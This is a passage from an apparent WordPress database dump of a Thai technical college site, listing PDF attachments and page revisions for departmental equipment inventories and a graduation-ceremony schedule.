#0000ff;\">ประเภทวิชาเทคโนโลยีสารสนเทศและการสื่อสาร</span></h2>\r\n<ul>\r\n <li>\r\n<h4><a href=\"/wp-content/uploads/2018/02/แผนกวิชาเทคโนโลยีสารสนเทศ.pdf\">แผนกวิชาเทคโนโลยีสารสนเทศ</a></h4>\r\n</li>\r\n <li>\r\n<h4><a href=\"/wp-content/uploads/2018/02/แผนกวิชา-Central-Lab.pdf\">แผนกวิชา Central Lab</a></h4>\r\n</li>\r\n</ul>\r\n \r\n<h2><span style=\"color: #0000ff;\">หมวดวิชาสามัญ</span></h2>\r\n<ul>\r\n <li>\r\n<h4><a href=\"/wp-content/uploads/2018/02/หมวดคณิตศาสตร์.pdf\">หมวดวิชาคณิตศาสตร์</a></h4>\r\n</li>\r\n <li>\r\n<h4><a href=\"/wp-content/uploads/2018/02/หมวดภาษาอังกฤษ.pdf\">หมวดวิชาภาษาอังกฤษ</a></h4>\r\n</li>\r\n <li>\r\n<h4><a href=\"/wp-content/uploads/2018/02/หมวดภาษาไทย.pdf\">หมวดวิชาภาษาไทย</a></h4>\r\n</li>\r\n <li>\r\n<h4><a href=\"/wp-content/uploads/2018/02/หมวดวิทยาศาสตร์.pdf\">หมวดวิชาวิทยาศาสตร์</a></h4>\r\n</li>\r\n <li>\r\n<h4><a href=\"/wp-content/uploads/2018/02/หมวดสังคมศึกษา.pdf\">หมวดวิชาสังคมศึกษา</a></h4>\r\n</li>\r\n <li>\r\n<h4><a href=\"/wp-content/uploads/2018/02/หมวดพลานามัย.pdf\">หมวดวิชาพลานามัย</a></h4>\r\n</li>\r\n</ul>\r\n ', 'ข้อมูลครุภัณฑ์', '', 'publish', 'closed', 'closed', '', '%e0%b8%82%e0%b9%89%e0%b8%ad%e0%b8%a1%e0%b8%b9%e0%b8%a5%e0%b8%84%e0%b8%a3%e0%b8%b8%e0%b8%a0%e0%b8%b1%e0%b8%93%e0%b8%91%e0%b9%8c60', '', '', '2019-02-22 14:04:19', '2019-02-22 07:04:19', '', 0, 'http://www.technicrayong.ac.th/?page_id=1399', 0, 'page', '', 0),
(1400, 3, '2018-02-27 15:40:14', '2018-02-27 08:40:14', '', 'แผนกวิชาก่อสร้าง', '', 'inherit', 'closed', 'closed', '', '%e0%b9%81%e0%b8%9c%e0%b8%99%e0%b8%81%e0%b8%a7%e0%b8%b4%e0%b8%8a%e0%b8%b2%e0%b8%81%e0%b9%88%e0%b8%ad%e0%b8%aa%e0%b8%a3%e0%b9%89%e0%b8%b2%e0%b8%87', '', '', '2018-02-27 15:40:14', '2018-02-27 08:40:14', '', 1399, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/02/แผนกวิชาก่อสร้าง.pdf', 0, 'attachment', 'application/pdf', 0),
(1401, 3, '2018-02-27 15:40:17', '2018-02-27 08:40:17', '', 'แผนกวิชาเคมีอุตสาหกรรม', '', 'inherit', 'closed', 'closed', '', '%e0%b9%81%e0%b8%9c%e0%b8%99%e0%b8%81%e0%b8%a7%e0%b8%b4%e0%b8%8a%e0%b8%b2%e0%b9%80%e0%b8%84%e0%b8%a1%e0%b8%b5%e0%b8%ad%e0%b8%b8%e0%b8%95%e0%b8%aa%e0%b8%b2%e0%b8%ab%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1', '', '', '2018-02-27 15:40:17', '2018-02-27 08:40:17', '', 1399, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/02/แผนกวิชาเคมีอุตสาหกรรม.pdf', 0, 'attachment', 'application/pdf', 0),
(1402, 3, '2018-02-27 15:40:21', '2018-02-27 08:40:21', '', 'แผนกวิชาเครื่องมือวัดและควบคุม', '', 'inherit', 'closed', 'closed', '', '%e0%b9%81%e0%b8%9c%e0%b8%99%e0%b8%81%e0%b8%a7%e0%b8%b4%e0%b8%8a%e0%b8%b2%e0%b9%80%e0%b8%84%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a1%e0%b8%b7%e0%b8%ad%e0%b8%a7%e0%b8%b1%e0%b8%94%e0%b9%81', '', '', '2018-02-27 15:40:21', '2018-02-27 08:40:21', '', 1399, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/02/แผนกวิชาเครื่องมือวัดและควบคุม.pdf', 0, 'attachment', 'application/pdf', 0),
(1403, 3, '2018-02-27 15:40:25', '2018-02-27 08:40:25', '', 'แผนกวิชาช่างกล', '', 'inherit', 'closed', 'closed', '', '%e0%b9%81%e0%b8%9c%e0%b8%99%e0%b8%81%e0%b8%a7%e0%b8%b4%e0%b8%8a%e0%b8%b2%e0%b8%8a%e0%b9%88%e0%b8%b2%e0%b8%87%e0%b8%81%e0%b8%a5', '', '', '2018-02-27 15:40:25', '2018-02-27 08:40:25', '', 1399, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/02/แผนกวิชาช่างกล.pdf', 0, 'attachment', 'application/pdf', 0),
(1404, 3, '2018-02-27 15:40:29', '2018-02-27 08:40:29', '', 'แผนกวิชาช่างเชื่อม', '', 'inherit', 'closed', 'closed', '', '%e0%b9%81%e0%b8%9c%e0%b8%99%e0%b8%81%e0%b8%a7%e0%b8%b4%e0%b8%8a%e0%b8%b2%e0%b8%8a%e0%b9%88%e0%b8%b2%e0%b8%87%e0%b9%80%e0%b8%8a%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%a1', '', '', '2018-02-27 15:40:29', '2018-02-27 08:40:29', '', 1399, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/02/แผนกวิชาช่างเชื่อม.pdf', 0, 'attachment', 'application/pdf', 0),
(1405, 3, '2018-02-27 15:40:30', '2018-02-27 08:40:30', '', 'แผนกวิชาช่างยนต์', '', 'inherit', 'closed', 'closed', '', '%e0%b9%81%e0%b8%9c%e0%b8%99%e0%b8%81%e0%b8%a7%e0%b8%b4%e0%b8%8a%e0%b8%b2%e0%b8%8a%e0%b9%88%e0%b8%b2%e0%b8%87%e0%b8%a2%e0%b8%99%e0%b8%95%e0%b9%8c', '', '', '2018-02-27 15:40:30', '2018-02-27 08:40:30', '', 1399, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/02/แผนกวิชาช่างยนต์.pdf', 0, 'attachment', 'application/pdf', 0),
(1406, 3, '2018-02-27 15:40:31', '2018-02-27 08:40:31', '', 'แผนกวิชาเทคโนโลยียาง', '', 'inherit', 'closed', 'closed', '', '%e0%b9%81%e0%b8%9c%e0%b8%99%e0%b8%81%e0%b8%a7%e0%b8%b4%e0%b8%8a%e0%b8%b2%e0%b9%80%e0%b8%97%e0%b8%84%e0%b9%82%e0%b8%99%e0%b9%82%e0%b8%a5%e0%b8%a2%e0%b8%b5%e0%b8%a2%e0%b8%b2%e0%b8%87', '', '', '2018-02-27 15:40:31', '2018-02-27 08:40:31', '', 1399, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/02/แผนกวิชาเทคโนโลยียาง.pdf', 0, 'attachment', 'application/pdf', 0),
(1407, 3, '2018-02-27 15:40:33', '2018-02-27 08:40:33', '', 'แผนกวิชาปิโตรเคมี', '', 'inherit', 'closed', 'closed', '', '%e0%b9%81%e0%b8%9c%e0%b8%99%e0%b8%81%e0%b8%a7%e0%b8%b4%e0%b8%8a%e0%b8%b2%e0%b8%9b%e0%b8%b4%e0%b9%82%e0%b8%95%e0%b8%a3%e0%b9%80%e0%b8%84%e0%b8%a1%e0%b8%b5', '', '', '2018-02-27 15:40:33', '2018-02-27 08:40:33', '', 1399, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/02/แผนกวิชาปิโตรเคมี.pdf', 0, 'attachment', 'application/pdf', 0),
(1408, 3, '2018-02-27 15:40:34', '2018-02-27 08:40:34', '', 'แผนกวิชาไฟฟ้า', '', 'inherit', 'closed', 'closed', '', '%e0%b9%81%e0%b8%9c%e0%b8%99%e0%b8%81%e0%b8%a7%e0%b8%b4%e0%b8%8a%e0%b8%b2%e0%b9%84%e0%b8%9f%e0%b8%9f%e0%b9%89%e0%b8%b2', '', '', '2018-02-27 15:40:34', '2018-02-27 08:40:34', '', 1399, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/02/แผนกวิชาไฟฟ้า.pdf', 0, 'attachment', 'application/pdf', 0),
(1409, 3, '2018-02-27 15:40:36', '2018-02-27 08:40:36', '', 'แผนกวิชาอิเล็กทรอนิกส์', '', 'inherit', 'closed', 'closed', '', '%e0%b9%81%e0%b8%9c%e0%b8%99%e0%b8%81%e0%b8%a7%e0%b8%b4%e0%b8%8a%e0%b8%b2%e0%b8%ad%e0%b8%b4%e0%b9%80%e0%b8%a5%e0%b9%87%e0%b8%81%e0%b8%97%e0%b8%a3%e0%b8%ad%e0%b8%99%e0%b8%b4%e0%b8%81%e0%b8%aa%e0%b9%8c-2', '', '', '2018-02-27 15:40:36', '2018-02-27 08:40:36', '', 1399, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/02/แผนกวิชาอิเล็กทรอนิกส์.pdf', 0, 'attachment', 'application/pdf', 0),
(1410, 3, '2018-02-27 15:45:48', '2018-02-27 08:45:48', '<h3><span style=\"color: #0000ff;\">ประเภทวิชาอุตสาหกรรม</span></h3>\r\n<h3><span style=\"color: #0000ff;\">แผนกวิชาช่างยนต์</span></h3>\r\n[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F02%2F%E0%B9%81%E0%B8%9C%E0%B8%99%E0%B8%81%E0%B8%A7%E0%B8%B4%E0%B8%8A%E0%B8%B2%E0%B8%8A%E0%B9%88%E0%B8%B2%E0%B8%87%E0%B8%A2%E0%B8%99%E0%B8%95%E0%B9%8C.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]\r\n<h3><span style=\"color: #0000ff;\">แผนกวิชาช่างกล</span></h3>\r\n[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F02%2F%E0%B9%81%E0%B8%9C%E0%B8%99%E0%B8%81%E0%B8%A7%E0%B8%B4%E0%B8%8A%E0%B8%B2%E0%B8%8A%E0%B9%88%E0%B8%B2%E0%B8%87%E0%B8%81%E0%B8%A5.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]\r\n<h3><span style=\"color: #0000ff;\">แผนกวิชาช่างเชื่อม</span></h3>\r\n[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F02%2F%E0%B9%81%E0%B8%9C%E0%B8%99%E0%B8%81%E0%B8%A7%E0%B8%B4%E0%B8%8A%E0%B8%B2%E0%B8%8A%E0%B9%88%E0%B8%B2%E0%B8%87%E0%B9%80%E0%B8%8A%E0%B8%B7%E0%B9%88%E0%B8%AD%E0%B8%A1.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]\r\n<h3><span style=\"color: #0000ff;\">แผนกวิชาไฟฟ้า</span></h3>\r\n[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F02%2F%E0%B9%81%E0%B8%9C%E0%B8%99%E0%B8%81%E0%B8%A7%E0%B8%B4%E0%B8%8A%E0%B8%B2%E0%B9%84%E0%B8%9F%E0%B8%9F%E0%B9%89%E0%B8%B2.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]\r\n<h3><span style=\"color: #0000ff;\">แผนกวิชาอิเล็กทรอนิกส์</span></h3>\r\n[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F02%2F%E0%B9%81%E0%B8%9C%E0%B8%99%E0%B8%81%E0%B8%A7%E0%B8%B4%E0%B8%8A%E0%B8%B2%E0%B8%AD%E0%B8%B4%E0%B9%80%E0%B8%A5%E0%B9%87%E0%B8%81%E0%B8%97%E0%B8%A3%E0%B8%AD%E0%B8%99%E0%B8%B4%E0%B8%81%E0%B8%AA%E0%B9%8C.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]\r\n<h3><span style=\"color: #0000ff;\">แผนกวิชาก่อสร้าง</span></h3>\r\n[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F02%2F%E0%B9%81%E0%B8%9C%E0%B8%99%E0%B8%81%E0%B8%A7%E0%B8%B4%E0%B8%8A%E0%B8%B2%E0%B8%81%E0%B9%88%E0%B8%AD%E0%B8%AA%E0%B8%A3%E0%B9%89%E0%B8%B2%E0%B8%87.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]\r\n<h3><span style=\"color: #0000ff;\">แผนกวิชาเครื่องมือวัดและควบคุม</span></h3>\r\n[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F02%2F%E0%B9%81%E0%B8%9C%E0%B8%99%E0%B8%81%E0%B8%A7%E0%B8%B4%E0%B8%8A%E0%B8%B2%E0%B9%80%E0%B8%84%E0%B8%A3%E0%B8%B7%E0%B9%88%E0%B8%AD%E0%B8%87%E0%B8%A1%E0%B8%B7%E0%B8%AD%E0%B8%A7%E0%B8%B1%E0%B8%94%E0%B9%81%E0%B8%A5%E0%B8%B0%E0%B8%84%E0%B8%A7%E0%B8%9A%E0%B8%84%E0%B8%B8%E0%B8%A1.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]\r\n<h3><span style=\"color: #0000ff;\">แผนกวิชาปิโตรเคมี</span></h3>\r\n[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F02%2F%E0%B9%81%E0%B8%9C%E0%B8%99%E0%B8%81%E0%B8%A7%E0%B8%B4%E0%B8%8A%E0%B8%B2%E0%B8%9B%E0%B8%B4%E0%B9%82%E0%B8%95%E0%B8%A3%E0%B9%80%E0%B8%84%E0%B8%A1%E0%B8%B5.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]\r\n<h3><span style=\"color: #0000ff;\">แผนกวิชาเคมีอุตสาหกรรม</span></h3>\r\n[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F02%2F%E0%B9%81%E0%B8%9C%E0%B8%99%E0%B8%81%E0%B8%A7%E0%B8%B4%E0%B8%8A%E0%B8%B2%E0%B9%80%E0%B8%84%E0%B8%A1%E0%B8%B5%E0%B8%AD%E0%B8%B8%E0%B8%95%E0%B8%AA%E0%B8%B2%E0%B8%AB%E0%B8%81%E0%B8%A3%E0%B8%A3%E0%B8%A1.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]\r\n<h3><span style=\"color: #0000ff;\">แผนกวิชาเทคโนโลยียาง</span></h3>\r\n[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F02%2F%E0%B9%81%E0%B8%9C%E0%B8%99%E0%B8%81%E0%B8%A7%E0%B8%B4%E0%B8%8A%E0%B8%B2%E0%B9%80%E0%B8%97%E0%B8%84%E0%B9%82%E0%B8%99%E0%B9%82%E0%B8%A5%E0%B8%A2%E0%B8%B5%E0%B8%A2%E0%B8%B2%E0%B8%87.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]', 'ข้อมูลครุภัณฑ์ ปีการศึกษา 2560', '', 'inherit', 'closed', 'closed', '', '1399-revision-v1', '', '', '2018-02-27 15:45:48', '2018-02-27 08:45:48', '', 1399, 'http://www.technicrayong.ac.th/1399-revision-v1/', 0, 'revision', '', 0),
(1412, 3, '2018-02-28 09:41:19', '2018-02-28 02:41:19', '', 'กำหนดการพิธีรับใบประกาศนียบัตร สำหรับผู้จบการศึกษา ระดับ ปวช.3 และ ปวส.2 ประจำปีการศึกษา 2560', '', 'inherit', 'closed', 'closed', '', '1370-autosave-v1', '', '', '2018-02-28 09:41:19', '2018-02-28 02:41:19', '', 1370, 'http://www.technicrayong.ac.th/1370-autosave-v1/', 0, 'revision', '', 0),
(1413, 3, '2018-02-28 09:41:54', '2018-02-28 02:41:54', '', 'กำหนดการพิธีรับใบประกาศนียบัตร 2560', '', 'inherit', 'closed', 'closed', '', '%e0%b8%81%e0%b8%b3%e0%b8%ab%e0%b8%99%e0%b8%94%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b8%9e%e0%b8%b4%e0%b8%98%e0%b8%b5%e0%b8%a3%e0%b8%b1%e0%b8%9a%e0%b9%83%e0%b8%9a%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%81%e0%b8%b2-2', '', '', '2018-02-28 09:41:54', '2018-02-28 02:41:54', '', 1370, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/02/กำหนดการพิธีรับใบประกาศนียบัตร-2560.pdf', 0, 'attachment', 'application/pdf', 0),
(1414, 3, '2018-02-28 09:42:15', '2018-02-28 02:42:15', '[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F02%2F%E0%B8%81%E0%B8%B3%E0%B8%AB%E0%B8%99%E0%B8%94%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B8%9E%E0%B8%B4%E0%B8%98%E0%B8%B5%E0%B8%A3%E0%B8%B1%E0%B8%9A%E0%B9%83%E0%B8%9A%E0%B8%9B%E0%B8%A3%E0%B8%B0%E0%B8%81%E0%B8%B2%E0%B8%A8%E0%B8%99%E0%B8%B5%E0%B8%A2%E0%B8%9A%E0%B8%B1%E0%B8%95%E0%B8%A3-2560.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]', 'กำหนดการพิธีรับใบประกาศนียบัตร สำหรับผู้จบการศึกษา ระดับ ปวช.3 และ ปวส.2 ประจำปีการศึกษา 2560', '', 'inherit', 'closed', 'closed', '', '1370-revision-v1', '', '', '2018-02-28 09:42:15', '2018-02-28 02:42:15', '', 1370, 'http://www.technicrayong.ac.th/1370-revision-v1/', 0, 'revision', '', 0),
(1416, 3, '2018-02-28 12:58:39', '2018-02-28 05:58:39', '', 'แผนกวิชาการบัญชี', '', 'inherit', 'closed', 'closed', '', '%e0%b9%81%e0%b8%9c%e0%b8%99%e0%b8%81%e0%b8%a7%e0%b8%b4%e0%b8%8a%e0%b8%b2%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b8%9a%e0%b8%b1%e0%b8%8d%e0%b8%8a%e0%b8%b5', '', '', '2018-06-13 10:12:06', '2018-06-13 03:12:06', '', 1399, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/02/แผนกวิชาการบัญชี.pdf', 0, 'attachment', 'application/pdf', 0),
(1417, 3, '2018-02-28 12:58:43', '2018-02-28 05:58:43', '', 'แผนกวิชาการเลขานุการ', '', 'inherit', 'closed', 'closed', '', '%e0%b9%81%e0%b8%9c%e0%b8%99%e0%b8%81%e0%b8%a7%e0%b8%b4%e0%b8%8a%e0%b8%b2%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b9%80%e0%b8%a5%e0%b8%82%e0%b8%b2%e0%b8%99%e0%b8%b8%e0%b8%81%e0%b8%b2%e0%b8%a3', '', '', '2018-06-13 10:12:40', '2018-06-13 03:12:40', '', 1399, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/02/แผนกวิชาการเลขานุการ.pdf', 0, 'attachment', 'application/pdf', 0),
(1418, 3, '2018-02-28 12:58:46', '2018-02-28 05:58:46', '', 'แผนกวิชาคอมพิวเตอร์ธุรกิจ', '', 'inherit', 'closed', 'closed', '', '%e0%b9%81%e0%b8%9c%e0%b8%99%e0%b8%81%e0%b8%a7%e0%b8%b4%e0%b8%8a%e0%b8%b2%e0%b8%84%e0%b8%ad%e0%b8%a1%e0%b8%9e%e0%b8%b4%e0%b8%a7%e0%b9%80%e0%b8%95%e0%b8%ad%e0%b8%a3%e0%b9%8c%e0%b8%98%e0%b8%b8%e0%b8%a3', '', '', '2018-06-13 10:12:49', '2018-06-13 03:12:49', '', 1399, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/02/แผนกวิชาคอมพิวเตอร์ธุรกิจ.pdf', 0, 'attachment', 'application/pdf', 0),
(1419, 3, '2018-02-28 12:58:49', '2018-02-28 05:58:49', '', 'แผนกวิชาโลจิสติกส์', '', 'inherit', 'closed', 'closed', '', '%e0%b9%81%e0%b8%9c%e0%b8%99%e0%b8%81%e0%b8%a7%e0%b8%b4%e0%b8%8a%e0%b8%b2%e0%b9%82%e0%b8%a5%e0%b8%88%e0%b8%b4%e0%b8%aa%e0%b8%95%e0%b8%b4%e0%b8%81%e0%b8%aa%e0%b9%8c', '', '', '2018-06-13 10:12:57', '2018-06-13 03:12:57', '', 1399, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/02/แผนกวิชาโลจิสติกส์.pdf', 0, 'attachment', 'application/pdf', 0),
(1420, 3, '2018-02-28 12:58:53', '2018-02-28 05:58:53', '', 'แผนกวิชาการตลาด', '', 'inherit', 'closed', 'closed', '', '%e0%b9%81%e0%b8%9c%e0%b8%99%e0%b8%81%e0%b8%a7%e0%b8%b4%e0%b8%8a%e0%b8%b2%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b8%95%e0%b8%a5%e0%b8%b2%e0%b8%94', '', '', '2018-06-13 10:12:24', '2018-06-13 03:12:24', '', 1399, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/02/แผนกวิชาการตลาด.pdf', 0, 'attachment', 'application/pdf', 0),
(1421, 3, '2018-02-28 13:00:39', '2018-02-28 06:00:39', '<h3><span style=\"color: #0000ff;\">ประเภทวิชาอุตสาหกรรม</span></h3>\r\n<h3><span style=\"color: #0000ff;\">แผนกวิชาช่างยนต์</span></h3>\r\n[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F02%2F%E0%B9%81%E0%B8%9C%E0%B8%99%E0%B8%81%E0%B8%A7%E0%B8%B4%E0%B8%8A%E0%B8%B2%E0%B8%8A%E0%B9%88%E0%B8%B2%E0%B8%87%E0%B8%A2%E0%B8%99%E0%B8%95%E0%B9%8C.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]\r\n<h3><span style=\"color: #0000ff;\">แผนกวิชาช่างกล</span></h3>\r\n[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F02%2F%E0%B9%81%E0%B8%9C%E0%B8%99%E0%B8%81%E0%B8%A7%E0%B8%B4%E0%B8%8A%E0%B8%B2%E0%B8%8A%E0%B9%88%E0%B8%B2%E0%B8%87%E0%B8%81%E0%B8%A5.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]\r\n<h3><span style=\"color: #0000ff;\">แผนกวิชาช่างเชื่อม</span></h3>\r\n[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F02%2F%E0%B9%81%E0%B8%9C%E0%B8%99%E0%B8%81%E0%B8%A7%E0%B8%B4%E0%B8%8A%E0%B8%B2%E0%B8%8A%E0%B9%88%E0%B8%B2%E0%B8%87%E0%B9%80%E0%B8%8A%E0%B8%B7%E0%B9%88%E0%B8%AD%E0%B8%A1.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]\r\n<h3><span style=\"color: #0000ff;\">แผนกวิชาไฟฟ้า</span></h3>\r\n[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F02%2F%E0%B9%81%E0%B8%9C%E0%B8%99%E0%B8%81%E0%B8%A7%E0%B8%B4%E0%B8%8A%E0%B8%B2%E0%B9%84%E0%B8%9F%E0%B8%9F%E0%B9%89%E0%B8%B2.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]\r\n<h3><span style=\"color: #0000ff;\">แผนกวิชาอิเล็กทรอนิกส์</span></h3>\r\n[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F02%2F%E0%B9%81%E0%B8%9C%E0%B8%99%E0%B8%81%E0%B8%A7%E0%B8%B4%E0%B8%8A%E0%B8%B2%E0%B8%AD%E0%B8%B4%E0%B9%80%E0%B8%A5%E0%B9%87%E0%B8%81%E0%B8%97%E0%B8%A3%E0%B8%AD%E0%B8%99%E0%B8%B4%E0%B8%81%E0%B8%AA%E0%B9%8C.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]\r\n<h3><span style=\"color: #0000ff;\">แผนกวิชาก่อสร้าง</span></h3>\r\n[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F02%2F%E0%B9%81%E0%B8%9C%E0%B8%99%E0%B8%81%E0%B8%A7%E0%B8%B4%E0%B8%8A%E0%B8%B2%E0%B8%81%E0%B9%88%E0%B8%AD%E0%B8%AA%E0%B8%A3%E0%B9%89%E0%B8%B2%E0%B8%87.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]\r\n<h3><span style=\"color: #0000ff;\">แผนกวิชาเครื่องมือวัดและควบคุม</span></h3>\r\n[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F02%2F%E0%B9%81%E0%B8%9C%E0%B8%99%E0%B8%81%E0%B8%A7%E0%B8%B4%E0%B8%8A%E0%B8%B2%E0%B9%80%E0%B8%84%E0%B8%A3%E0%B8%B7%E0%B9%88%E0%B8%AD%E0%B8%87%E0%B8%A1%E0%B8%B7%E0%B8%AD%E0%B8%A7%E0%B8%B1%E0%B8%94%E0%B9%81%E0%B8%A5%E0%B8%B0%E0%B8%84%E0%B8%A7%E0%B8%9A%E0%B8%84%E0%B8%B8%E0%B8%A1.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]\r\n<h3><span style=\"color: #0000ff;\">แผนกวิชาปิโตรเคมี</span></h3>\r\n[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F02%2F%E0%B9%81%E0%B8%9C%E0%B8%99%E0%B8%81%E0%B8%A7%E0%B8%B4%E0%B8%8A%E0%B8%B2%E0%B8%9B%E0%B8%B4%E0%B9%82%E0%B8%95%E0%B8%A3%E0%B9%80%E0%B8%84%E0%B8%A1%E0%B8%B5.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]\r\n<h3><span style=\"color: #0000ff;\">แผนกวิชาเคมีอุตสาหกรรม</span></h3>\r\n[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F02%2F%E0%B9%81%E0%B8%9C%E0%B8%99%E0%B8%81%E0%B8%A7%E0%B8%B4%E0%B8%8A%E0%B8%B2%E0%B9%80%E0%B8%84%E0%B8%A1%E0%B8%B5%E0%B8%AD%E0%B8%B8%E0%B8%95%E0%B8%AA%E0%B8%B2%E0%B8%AB%E0%B8%81%E0%B8%A3%E0%B8%A3%E0%B8%A1.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]\r\n<h3><span style=\"color: #0000ff;\">แผนกวิชาเทคโนโลยียาง</span></h3>\r\n[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F02%2F%E0%B9%81%E0%B8%9C%E0%B8%99%E0%B8%81%E0%B8%A7%E0%B8%B4%E0%B8%8A%E0%B8%B2%E0%B9%80%E0%B8%97%E0%B8%84%E0%B9%82%E0%B8%99%E0%B9%82%E0%B8%A5%E0%B8%A2%E0%B8%B5%E0%B8%A2%E0%B8%B2%E0%B8%87.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]\r\n<h3><span style=\"color: #0000ff;\">ประเภทวิชาพาณิชยกรรม/บริหารธุรกิจ</span></h3>\r\n<h3><span style=\"color: #0000ff;\">แผนกวิชาการบัญชี</span></h3>\r\n ', 'ข้อมูลครุภัณฑ์ ปีการศึกษา 2560', '', 'inherit', 'closed', 'closed', '', '1399-revision-v1', '', '', '2018-02-28 13:00:39', '2018-02-28 06:00:39', '', 1399, 'http://www.technicrayong.ac.th/1399-revision-v1/', 0, 'revision', '', 0),
(1422, 3, '2018-02-28 13:02:43', '2018-02-28 06:02:43', '<h3><span style=\"color: #0000ff;\">ประเภทวิชาอุตสาหกรรม</span></h3>\r\n<h3><span style=\"color: #0000ff;\">แผนกวิชาช่างยนต์</span></h3>\r\n[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F02%2F%E0%B9%81%E0%B8%9C%E0%B8%99%E0%B8%81%E0%B8%A7%E0%B8%B4%E0%B8%8A%E0%B8%B2%E0%B8%8A%E0%B9%88%E0%B8%B2%E0%B8%87%E0%B8%A2%E0%B8%99%E0%B8%95%E0%B9%8C.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]\r\n<h3><span style=\"color: #0000ff;\">แผนกวิชาช่างกล</span></h3>\r\n[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F02%2F%E0%B9%81%E0%B8%9C%E0%B8%99%E0%B8%81%E0%B8%A7%E0%B8%B4%E0%B8%8A%E0%B8%B2%E0%B8%8A%E0%B9%88%E0%B8%B2%E0%B8%87%E0%B8%81%E0%B8%A5.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]\r\n<h3><span style=\"color: #0000ff;\">แผนกวิชาช่างเชื่อม</span></h3>\r\n[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F02%2F%E0%B9%81%E0%B8%9C%E0%B8%99%E0%B8%81%E0%B8%A7%E0%B8%B4%E0%B8%8A%E0%B8%B2%E0%B8%8A%E0%B9%88%E0%B8%B2%E0%B8%87%E0%B9%80%E0%B8%8A%E0%B8%B7%E0%B9%88%E0%B8%AD%E0%B8%A1.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]\r\n<h3><span style=\"color: #0000ff;\">แผนกวิชาไฟฟ้า</span></h3>\r\n[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F02%2F%E0%B9%81%E0%B8%9C%E0%B8%99%E0%B8%81%E0%B8%A7%E0%B8%B4%E0%B8%8A%E0%B8%B2%E0%B9%84%E0%B8%9F%E0%B8%9F%E0%B9%89%E0%B8%B2.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]\r\n<h3><span style=\"color: 